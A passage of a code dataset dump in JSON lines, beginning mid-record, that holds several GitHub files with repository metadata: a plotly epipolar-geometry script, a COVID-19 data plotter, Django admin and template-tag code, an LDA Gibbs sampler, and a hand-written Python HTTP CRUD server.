0.45, -.25),\n (-1.5, 0.1, -.25),\n (-1.5, 0.1, 0.25),\n (-2.5, 0.45, 0.25),\n])\n\nplane2 = np.array([\n (1.5, 0.1, -.25),\n (2.5, 0.4, -.25),\n (2.5, 0.4, 0.25),\n (1.5, 0.1, 0.25),\n])\n\ntriangle = go.Scatter3d(\n x=points[:, 0], y=points[:, 1], z=points[:, 2],\n text=[\"Camera 1\", \"Camera 2\", \"X\"], hoverinfo='none',\n mode='markers+text'\n)\n\ntriangle_plane = go.Mesh3d(\n x=points[:, 0], y=points[:, 1], z=points[:, 2], opacity=0.50, hoverinfo='none'\n)\n\nplane1 = go.Mesh3d(\n x=plane1[:, 0], y=plane1[:, 1], z=plane1[:, 2],\n i=[0, 0], j=[1, 2], k=[2, 3], hoverinfo='none',\n name=\"image plane 1\"\n)\n\nplane2 = go.Mesh3d(\n x=plane2[:, 0], y=plane2[:, 1], z=plane2[:, 2],\n i=[0, 0], j=[1, 2], k=[2, 3], hoverinfo='none',\n name=\"image plane 2\"\n)\n\nfig = go.Figure(data=[triangle, triangle_plane, plane1, plane2])\n\nfig.update_layout(margin=dict(l=0, r=0, b=0, t=0))\nwith open(\"../assets/epipolar.json\", \"w\") as f:\n f.write(fig.to_json())\n", "repo_name": "haoda-li/notebook", "sub_path": "notebook/cs294173/scripts/epipolar.py", "file_name": "epipolar.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 27, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Scatter3d", "line_number": 24, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 24, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Mesh3d", "line_number": 30, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 30, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Mesh3d", "line_number": 34, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 34, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Mesh3d", "line_number": 40, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 40, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 46, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "70844282404", "text": "import pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nfrom src.util.utils import get_project_root\n\n\nclass Plotter:\n data_dir = os.path.join(str(get_project_root()), 'data')\n\n def create_wiki_dataframe(self):\n file_path = os.path.join(self.data_dir, 'wiki-covid-19-germany-2020-02-24--2020-03-16.txt')\n return pd.read_csv(file_path, header=0, index_col=0, thousands='.', sep='\\t') \\\n .replace(u'\\u2014', 0) \\\n .transpose() \\\n .astype(float)\n\n @staticmethod\n def display_county_histogram(df):\n print(df.columns)\n df.plot(kind='line', logy=True, ylim=(10, df['Gesamt'].max() + 1000))\n plt.legend(loc='upper left', ncol=2)\n plt.show()\n\n\nif __name__ == \"__main__\":\n dw = Plotter()\n dw.display_county_histogram(dw.create_wiki_dataframe())\n", "repo_name": "StefanieStoppel/covid19-scraper", "sub_path": "src/plotting/plotter.py", "file_name": "plotter.py", "file_ext": "py", "file_size_in_byte": 834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": 
"src.util.utils.get_project_root", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "17495199079", "text": "from django.contrib import admin\nfrom .models import Article, ArticleTags, Tags\nfrom django.forms import BaseInlineFormSet\nfrom django.core.exceptions import ValidationError\n\n\n\nclass RelationshipInlineForm(BaseInlineFormSet):\n def clean(self):\n is_main = 0\n for form in self.forms:\n print(form.cleaned_data)\n if form.cleaned_data:\n print(form.cleaned_data['is_main'])\n if form.cleaned_data['is_main']==True:\n is_main += True\n if is_main == 1:\n return super().clean()\n elif is_main == 0:\n raise ValidationError('Укажите основной раздел')\n else:\n raise ValidationError('Основным может быть только один раздел')\n\nclass RelationshipInline(admin.TabularInline):\n model = ArticleTags\n formset = RelationshipInlineForm\n extra = 1\n\n@admin.register(Article)\nclass ArticlAdmin(admin.ModelAdmin):\n inlines = [RelationshipInline]\n\n@admin.register(Tags)\nclass TagsAdmin(admin.ModelAdmin):\n pass\n\n@admin.register(ArticleTags)\nclass ArticleTagsAdmin(admin.ModelAdmin):\n list_display = ['id', 'article', 'tag', 'is_main']\n", "repo_name": "KostapaSh/my-dj-homeworks", "sub_path": "2.2-databases-2/m2m-relations/articles/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 1220, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.forms.BaseInlineFormSet", "line_number": 8, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 20, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.admin.TabularInline", "line_number": 24, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 24, "usage_type": "name"}, {"api_name": "models.ArticleTags", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 30, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Article", "line_number": 29, "usage_type": "argument"}, {"api_name": "django.contrib.admin", "line_number": 29, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 34, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 33, "usage_type": "call"}, {"api_name": "models.Tags", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.contrib.admin", "line_number": 33, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 38, "usage_type": "name"}, {"api_name": 
"django.contrib.admin.register", "line_number": 37, "usage_type": "call"}, {"api_name": "models.ArticleTags", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.contrib.admin", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "6152424120", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 22 17:25:38 2020\r\n\r\n@author: tom9m\r\n\"\"\"\r\n\r\nimport scipy.special\r\nfrom sklearn import preprocessing\r\nimport numpy as np\r\nimport sys\r\nimport os\r\nimport pickle\r\n\r\n\r\ndef main ():\r\n\r\n digamma=scipy.special.digamma\r\n print('Please, input document data.')\r\n file1=input()\r\n print('Please, input vocabulary data.')\r\n file2=input()\r\n print('Please, the name of output')\r\n outname=input()\r\n with open(file1,\"rb\")as f0:\r\n documents_stem_id=pickle.load(f0)\r\n with open(file2,\"rb\")as f1:\r\n data=f1.readlines()\r\n V=len(data)\r\n print('Please,input the number of topics')\r\n K=int(input()) #トピック数の指定\r\n print('Please,input the number of epoch')\r\n epoch=int(input()) #トピック数の指定\r\n\r\n D=len(documents_stem_id)#文書数の指定\r\n #V=int(sys.argv[3])#語彙数の指定\r\n N_dk = np.zeros([D,K]) #文書dでトピックkが割り振られた単語数\r\n N_kv = np.zeros([K,V]) #文書集合全体で語彙vにトピックkが割り振られた単語数 \r\n N_k = np.zeros([K,1]) #文書集合全体でトピックkが割り振られた単語数\r\n N_d=np.zeros([D,1])#各ドキュメントの長さ\r\n for d in range(D):\r\n N_d[d]=len(documents_stem_id[d])\r\n #文書dのn番目の単語に付与されたトピック\r\n theta_k_=np.zeros([K])\r\n phi_kv_=np.zeros([K,V])\r\n \r\n z_dn=[]\r\n for d in range(D):\r\n z_dn.append(np.random.randint(0, K,len(documents_stem_id[d])) )\r\n #N_dkとN_kについて\r\n for i in range(len(z_dn[d])):\r\n N_dk[d,z_dn[d][i]]+=1\r\n N_k[z_dn[d][i]]+=1\r\n #N_kvについて \r\n for v,k in zip(documents_stem_id[d],z_dn[d]):\r\n N_kv[k,v]+=1\r\n \r\n alpha=np.ones([K],dtype='float')*50/K\r\n beta=0.1\r\n \r\n for i in range(epoch):\r\n print(\"Epoch: {}\".format(i+1))\r\n numerator_p = 0\r\n denominator_p = 0\r\n loglikelihood=0\r\n for d in range(D):\r\n sys.stdout.write(\"\\r%d / %d\" % (d+1, D))\r\n sys.stdout.flush()\r\n for n in np.random.permutation(len(documents_stem_id[d])):#単語をバラバラに見る\r\n current_topic = z_dn[d][n]\r\n v=documents_stem_id[d][n]\r\n #if(current_topic>0):#自身のカウントを引く\r\n N_dk[d, current_topic] -= 1\r\n N_kv[current_topic, v] -= 1\r\n N_k[current_topic] -= 1\r\n theta_phi=0\r\n if (N_kv[current_topic, v]<0):\r\n print(N_kv[current_topic, v])\r\n \r\n \r\n #サンプリング確率と尤度を計算-----------------------------------------------------------\r\n p_z_dn = np.zeros(K)\r\n theta_phi=0\r\n for k in range(K):\r\n \r\n A = N_dk[d,k] + alpha[k]\r\n B = (N_kv[k,v] + beta)/(N_k[k] + beta*V)\r\n \r\n p = A * B \r\n if(p < 0):\r\n break\r\n p_z_dn[k] = p\r\n \r\n theta_k = (N_dk[d,k]+alpha[k]) / (N_d[d]+alpha[k]*K) # \r\n \r\n theta_k_[k]=theta_k[0]\r\n \r\n phi_kv = (N_kv[k,v]+beta) /(N_k[k]+beta*V) #\r\n phi_kv_[k,v]=phi_kv[0]\r\n theta_phi +=theta_k*phi_kv\r\n \r\n loglikelihood += np.log(theta_phi)\r\n p_z_dn = preprocessing.normalize(p_z_dn.reshape(1, -1), norm=\"l1\")[0] # 正規化\r\n \r\n #-------------------------------------------------------------------------------\r\n \r\n #カテゴリカル分布を使って文書dのn番目の単語のトピックをサンプリング \r\n new_topic=np.argmax(np.random.multinomial(1, p_z_dn, size=1))#最大となるインデックスを返す\r\n z_dn[d][n]=new_topic\r\n \r\n N_dk[d, new_topic] += 1\r\n N_kv[new_topic, v] += 1\r\n N_k[new_topic] += 1\r\n numerator_p += loglikelihood\r\n denominator_p += N_d[d]\r\n \r\n \r\n # パラメータ更新\r\n #α トピック分布用のパラメータ\r\n for k in range(K):\r\n numerator=0\r\n denominator=0\r\n for d in range(D):\r\n numerator 
+=digamma(N_dk[d][k]+alpha[k])- digamma(alpha[k])\r\n denominator += digamma(N_d[d]+np.sum(alpha))- digamma(np.sum(alpha))\r\n alpha[k] = alpha[k]*(numerator / denominator)\r\n if(alpha[k]<=0):\r\n alpha[k]=0.1\r\n\r\n \r\n \r\n #β 単語分布用のパラメータ\r\n numerator = np.sum(digamma(N_kv+beta)) - K*V*digamma(beta)\r\n denominator = V*(np.sum(digamma(N_k+beta*V)) - K*digamma(beta*V))\r\n beta = beta*(numerator / denominator)\r\n \r\n \r\n #パラメータ出力\r\n print(\"\\nparameters\")\r\n print(\"alpha :{}\".format(alpha))\r\n print(\"beta :{}\".format(beta))\r\n if not os.path.isdir('n_kv'):\r\n os.makedirs('n_kv')\r\n if not os.path.isdir('n_k'):\r\n os.makedirs('n_k')\r\n if not os.path.isdir('n_dk'):\r\n os.makedirs('n_dk') \r\n if not os.path.isdir('theta_k'):\r\n os.makedirs('theta_k') \r\n if not os.path.isdir('phi_kv'):\r\n os.makedirs('phi_kv') \r\n np.savetxt('n_kv/n_kv_{}.txt'.format(outname),N_kv) \r\n np.savetxt('n_k/n_k_{}.txt'.format(outname),N_k)\r\n np.savetxt('n_dk/n_dk_{}.txt'.format(outname),N_dk)\r\n np.savetxt('theta_k/theta_k_{}.txt'.format(outname),theta_k_)\r\n np.savetxt('phi_kv/phi_kv_{}.txt'.format(outname),phi_kv_)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n main () \r\n", "repo_name": "tom9m9m9/lda", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6138, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scipy.special.special", "line_number": 18, "usage_type": "attribute"}, {"api_name": "scipy.special", "line_number": 18, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 58, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 67, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 68, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 103, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random.multinomial", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path.isdir", 
"line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path", "line_number": 148, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 156, "usage_type": "call"}]} +{"seq_id": "11647050223", "text": "from django import template\nfrom django.utils.safestring import mark_safe\n\nfrom products.models import *\n\nregister = template.Library()\n\nTABLE_HEAD = \"\"\"\n \n \n \"\"\"\n\nTABLE_TAIL = \"\"\"\n \n
    \n \"\"\"\n\nTABLE_CONTENT = \"\"\"\n \n {name}\n {value}\n \n \"\"\"\n\nPRODUCT_SPEC = {\n 'notebook': {\n 'Діагональ дисплея': 'display',\n 'Тип накопичувача': 'rom',\n 'Об\\'єм пам\\'яті, Гб': 'rom_capacity',\n 'Тип оперативної пам\\'яті': 'ram',\n 'Об\\'єм оперативної пам\\'яті, Гб': 'rom_capacity',\n 'Час автономної роботи, години': 'battery_lifetime',\n 'Ємніть батареї, Ват-г': 'battery_capacity',\n },\n 'tablet': {\n 'Діагональ дисплея': 'display',\n 'Об\\'єм пам\\'яті, Гб': 'rom_capacity',\n 'Об\\'єм оперативної пам\\'яті, Гб': 'rom_capacity',\n 'Наявність фронтальної камери': 'is_front_cam',\n 'Фронтальна камера, МП': 'front_cam',\n 'Наявність задня камери': 'is_back_cam',\n 'Задня камера, МП': 'back_cam',\n 'Підтримка SD карт': 'is_sd',\n 'Максимальний обсяг пам\\'яті, Гб': 'sd',\n 'Час автономної роботи, години': 'battery_lifetime',\n 'Ємніть батареї, мАг': 'battery_capacity',\n },\n 'personalcomputer': {\n 'Тип накопичувача': 'rom',\n 'Об\\'єм пам\\'яті, Гб': 'rom_capacity',\n 'Тип оперативної пам\\'яті': 'ram',\n 'Об\\'єм оперативної пам\\'яті, Гб': 'rom_capacity',\n },\n 'smartphone': {\n 'Діагональ дисплея': 'display',\n 'Об\\'єм пам\\'яті': 'rom_capacity',\n 'Об\\'єм оперативної пам\\'яті': 'rom_capacity',\n 'Наявність фронтальної камери': 'is_front_cam',\n 'Фронтальна камера': 'front_cam',\n 'Наявність задня камери': 'is_back_cam',\n 'Задня камера': 'back_cam',\n 'Підтримка SD карт': 'is_sd',\n 'Максимальний обсяг пам\\'яті, Гб': 'sd',\n 'Час автономної роботи, години': 'battery_lifetime',\n 'Ємніть батареї, мАг': 'battery_capacity',\n },\n 'tvset': {\n 'Діагональ дисплея': 'display',\n 'Формат екрану': 'ds_type',\n 'Роздільна здатність екрану': 'ds_resolution',\n },\n 'audio': {\n 'Тип': 'audio_type',\n 'Тип підключення': 'connect_type',\n 'Мінімальна частота навушника, Гц': 'min_sound_freq',\n 'Максимальна частота навушника, Гц': 'max_sound_freq',\n },\n}\n\n\ndef get_product_spec(product, model_name):\n table_content = ''\n for name, value in PRODUCT_SPEC[model_name].items():\n table_content += TABLE_CONTENT.format(name=name, value=getattr(product, value))\n return table_content\n\n\n@register.filter\ndef product_spec(product):\n model_name = product.__class__._meta.model_name\n return mark_safe(TABLE_HEAD + get_product_spec(product, model_name) + TABLE_TAIL)\n\n", "repo_name": "mmeerrccyy/eltexua", "sub_path": "products/templatetags/specifications.py", "file_name": "specifications.py", "file_ext": "py", "file_size_in_byte": 3722, "program_lang": "python", "lang": "uk", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.template.Library", "line_number": 6, "usage_type": "call"}, {"api_name": "django.template", "line_number": 6, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "12148116609", "text": "#!/usr/bin/python3\n\n'''\nWeb server to accept incomming HTTP requests.\n\nThis will constitute as our \"[C]ontroller\" in the MVC architecture.\n'''\n\nimport re\nimport os\nimport sys\nimport json\nimport time\nimport signal\nimport sqlite3\nimport os.path\nfrom urllib.parse import quote\nfrom urllib.parse import unquote\nfrom urllib.parse import urlparse\nfrom urllib.parse import parse_qs\nfrom http.server import HTTPServer\nfrom http.server import BaseHTTPRequestHandler\nfrom socketserver import ThreadingMixIn\n# from socketserver import ForkingMixIn # This does not work on windows\n# import asyncio # I haven't used this enough. 
If I have time I\n# might try to utilize it.\n\n\nfrom models import Model\nfrom utils import getMimeTypeFromFile\n\n\nVERSION = '0.0.1'\n\nSTART_TIME = time.time()\n\n\n# TODO: load templates up on start up.\n\n\n# Basic server for handling requests\nclass Controller(BaseHTTPRequestHandler):\n\n ''' I hand rolled this using the standard modules to avoid any dependency issues.\n It was nice learing more about the http.server module even though it is pretty\n low level (at least for Python). Since the BaseHTTPRequestHandler class is\n fairly low level, I have implemented several methods to mimic some basic\n functionaly that would be present in 'out-of-the-box' frameworks.\n\n I typically use frameworks such as Django, Tornado or Flask for Python\n webs development. I like using Gorilla for GoLang web development.\n\n TODO:\n - Add a custom log format. I don't like the default one.\n '''\n\n def redirect(self, path):\n ''' A simple helper method for implementing HTTP redirects '''\n self.send_response(302)\n self.send_header('Location', '/')\n self.end_headers()\n\n def send(self, content, content_type='text/plain', status=200):\n ''' A helper method for sending the HTTP response '''\n self.send_response(status)\n self.send_header(\"Content-type\", content_type)\n self.end_headers()\n if bytes != type(content):\n self.wfile.write(bytes(content, \"UTF-8\"))\n else:\n self.wfile.write(content)\n self.wfile.flush()\n\n # The next few methods are just helpers to keep things clean\n # within our application logic.\n def sendJSON(self, payload, status=200):\n self.send(\n json.dumps(payload),\n content_type='application/json',\n status=status)\n\n def sendHTML(self, content, status=200):\n self.send(content, content_type='text/html', status=status)\n\n def errorNotFound(self, message='Not Found'):\n self.sendJSON({\"status\": \"error\", \"error\": {\n \"message\": message}}, status=404)\n\n def errorMethodNotAllowed(self, message='Method Not Allowed'):\n self.sendJSON({\"status\": \"error\", \"error\": {\n \"message\": message}}, status=405)\n\n def errorMethodBadRequest(self, message='Bad Request'):\n self.sendJSON({\"status\": \"error\", \"error\": {\n \"message\": message}}, status=400)\n\n def sendAPIResponse(self, **kwargs):\n return self.sendJSON({\n \"status\": 'ok' if 200 == kwargs.get('status', 200) else 'error',\n \"data\": kwargs\n }, kwargs.get('status', 200))\n\n def sendStaticFile(self, fpath):\n if os.path.exists(fpath):\n with open(fpath, 'rb') as fh:\n content = fh.read()\n contentType = getMimeTypeFromFile(fpath)[0]\n return self.send(content, content_type=contentType)\n self.errorNotFound()\n\n # This section contains methods to help get/collect parameters\n # sent in the HTTP request.\n @property\n def body(self):\n ''' According to the documentation the BaseHTTPRequestHandler.rfile attribute\n is an io.BufferedIOBase.\n\n I haven't explored this too far but I will go with the assumption that we\n can only read from it once. 
To avoid any possible issues with multiple reads,\n I will cache the results after the first read.\n '''\n if hasattr(self, '_body'):\n return self._body\n content_len = int(self.headers.get('content-length', 0))\n self._body = self.rfile.read(content_len)\n return self._body\n\n def json(self):\n ''' Parses JSON payloads contained in the request body '''\n if 'application/json' == self.headers.get('content-type'):\n if self.body:\n try:\n return json.loads(self.body)\n except BaseException:\n return {}\n return {}\n\n @property\n def form(self):\n ''' Parses forms contained in the request body '''\n if 'application/x-www-form-urlencoded' == self.headers.get(\n 'content-type'):\n if self.body:\n params = parse_qs(self.body)\n return {\n k.decode(): v[0].decode() for k,\n v in params.items() if v is not None}\n return {}\n\n @property\n def args(self):\n ''' Parses url query string parameters '''\n params = parse_qs(urlparse(self.path).query)\n return {\n k: v[0] for k, v in params.items() if v is not None\n }\n\n @property\n def params(self):\n ''' This merges parameters sent via different methods (JSON, form and query string).\n We will prioritize data sent within the request body.\n '''\n params = {\n **self.args,\n **self.form,\n **self.json().get('params', {})\n }\n # Get any parameters from the URL\n id = self.getModelIDFromRequestURL()\n if id:\n params['id'] = id\n return params\n\n # These two methods are just helper functions for the application logic.\n def getModelIDFromRequestURL(self):\n ''' This extracts the 'name' parameter from the url.\n\n Pretty clunky and room for improvement.\n '''\n url = urlparse(self.path)\n if url.path.startswith('/api/v1/model/'):\n parts = url.path.replace('/api/v1/model/', '').split('/')\n return quote(parts[0])\n elif url.path.startswith('/model/'):\n parts = url.path.replace('/model/', '').split('/')\n return quote(parts[0])\n return None\n\n def getModel(self):\n ''' Fetches the Model object for the given 'name' supplied by the request. '''\n id = self.params.get('id')\n models = Model.fetch(id=id)\n return models[0] if len(models) else None\n\n # Here are the HTTP request handlers.\n # This section contains the bulk for our application logic.\n\n def indexHandler(self):\n ''' HTTP handler for our index path.\n\n This technically our [V]iew in the MVC architecture.\n\n In a 'simple' MVC website we might construct different views for each action\n a user could do. 
I decided to take some liberties here and create a more dynamic\n website, were all the functional requirements are folded together into a single\n page.\n\n Instead of using Python to generate raw HTML, I decided to push this job\n to a front end framework called Vue (https://vuejs.org/v2/guide/index.html).\n I felt this would better demonstrate some modern web development approaches\n as well as my full stack development capabilities.\n '''\n fpath = os.path.join('tmpl', 'page.html')\n with open(fpath) as fh:\n tmpl = fh.read()\n data = [model.toDict() for model in Model.fetch(**self.params)]\n page = tmpl.replace('{{models}}', json.dumps(data))\n self.sendHTML(page)\n\n def pingHandler(self):\n self.sendAPIResponse(\n version=VERSION,\n start_time=START_TIME,\n up_time=time.time() - START_TIME\n )\n\n # This is a more traditional \"View\" for MVC.\n def modelHandler(self, message=''):\n model = self.getModel()\n if model:\n fpath = os.path.join('tmpl', 'model.html')\n with open(fpath) as fh:\n tmpl = fh.read()\n page = tmpl.format(**model.toDict(), message=message)\n return self.sendHTML(page)\n self.errorNotFound()\n\n def updateModel(self):\n model = self.getModel()\n if model:\n params = self.params\n model.color = params.get('color', model.color)\n model.make = params.get('make', model.make)\n model.status = params.get('status', model.status)\n model.save()\n return model\n\n def do_HEAD(self):\n return\n\n def do_POST(self):\n ''' An HTTP handler for the [C]reate method in the CRUD application. '''\n url = urlparse(self.path)\n\n # Handle redirects\n if '/' == url.path:\n return self.indexHandler()\n\n elif url.path in ['/api/v1/model', '/create']:\n try:\n # Create new model\n model = Model(**self.params)\n model.save()\n\n # Depending on endpoint return api response or redirect.\n if '/api/v1/model' == url.path:\n return self.sendAPIResponse(model=model.toDict())\n else:\n return self.redirect('/')\n\n except Exception as e:\n return self.errorMethodBadRequest(str(e))\n\n # I did not realize PUT was not allowed in forms...\n elif re.match(r'^/model/[^/]+$', url.path):\n if self.updateModel():\n return self.modelHandler(message='Model updated')\n\n self.errorNotFound()\n\n def do_GET(self):\n ''' An HTTP handler for the [R]ead method in the CRUD application. '''\n url = urlparse(self.path)\n\n # Handle redirects\n if '/' == url.path:\n return self.indexHandler()\n\n # Handler static assets...\n # TODO: Add a better handler for static folders.\n elif url.path.startswith('/static/'):\n parts = url.path.split('/')\n fpath = os.path.join(*[part for part in parts if part])\n return self.sendStaticFile(fpath)\n\n # It's always nice to include a route for health checks.\n elif '/ping' == url.path:\n return self.pingHandler()\n\n # This is a more traditional 'View' for MVC.\n elif re.match(r'^/model/[^/]+$', url.path):\n return self.modelHandler()\n\n # Basic API endpoints for testing\n elif '/api/v1/models' == url.path:\n return self.sendAPIResponse(models=[\n model.toDict() for model in Model.fetch(**self.params)\n ])\n\n elif re.match(r'^/api/v1/model/[^/]+$', url.path):\n model = self.getModel()\n if model:\n return self.sendAPIResponse(model=model.toDict())\n\n self.errorNotFound()\n\n def do_PUT(self):\n ''' An HTTP handler for the [U]pdate method in the CRUD application. 
'''\n        url = urlparse(self.path)\n\n        _isApiRequest = re.match(r'^/api/v1/model/[^/]+$', url.path)\n\n        # Handle the index route\n        if '/' == url.path:\n            return self.indexHandler()\n\n        elif _isApiRequest or re.match(r'^/model/[^/]+$', url.path):\n            model = self.updateModel()\n            if model:\n                # Depending on endpoint return api response or redirect.\n                if _isApiRequest:\n                    return self.sendAPIResponse(model=model.toDict())\n                else:\n                    return self.modelHandler(message='Model updated')\n\n        self.errorNotFound()\n\n    def do_DELETE(self):\n        ''' An HTTP handler for the [D]elete method in the CRUD application. '''\n        url = urlparse(self.path)\n\n        # Handle the index route\n        if '/' == url.path:\n            return self.indexHandler()\n\n        elif url.path.startswith('/api/v1/model/') or re.match(r'^/model/[^/]+$', url.path):\n            model = self.getModel()\n            if model:\n                model.delete()\n                if url.path.startswith('/api/v1/model/'):\n                    return self.sendAPIResponse()\n                else:\n                    return self.redirect('/')\n\n        self.errorNotFound()\n\n\nclass ThreadingSimpleServer(ThreadingMixIn, HTTPServer):\n    ''' SQLite did not like the ThreadingMixIn when we had a single persistent\n    database connection. I was going to scrap this and just use the plain\n    HTTPServer, but unfortunately I would get the occasional hang when using\n    multiple browser tabs.\n\n    This will occasionally deadlock when it is shutting down. I looked around\n    but haven't found a good solution yet. Due to this issue I would probably\n    look into using the asyncio module (or something similar) for future projects.\n    '''\n    pass\n\n\n# This is not supported for windows... sad day :(\n# class ForkingHTTPServer(ForkingMixIn, HTTPServer):\n#     '''\n#     I was seeing that the HTTPServer was hanging on multiple\n#     requests due to them blocking each other.\n#     The ForkingMixIn seems to have fixed these issues.\n#     '''\n#     pass\n\n\n\n# Listen and serve on specified host and port\ndef start(host='localhost', port=8080):\n    # server = HTTPServer((host, port), Controller)\n    # server = ForkingHTTPServer((host, port), Controller)\n    server = ThreadingSimpleServer((host, port), Controller)\n\n    # This addresses the occasional issue when the port does not\n    # get released on shutdown.\n    server.allow_reuse_address = True\n\n    # It looks like this parameter fixes the deadlock I was running into\n    # https://docs.python.org/3/library/socketserver.html#socketserver.ThreadingMixIn\n    # server.block_on_close = False\n    server.daemon_threads = True\n\n    print(\"Starting server at http://{0}:{1}\".format(host, port))\n\n    try:\n        server.serve_forever()\n    except KeyboardInterrupt:\n        pass\n    finally:\n        server.server_close()\n\n    print(\"Server stopped\")\n", "repo_name": "sjsafranek/dev_project_09082021", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 14090, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": 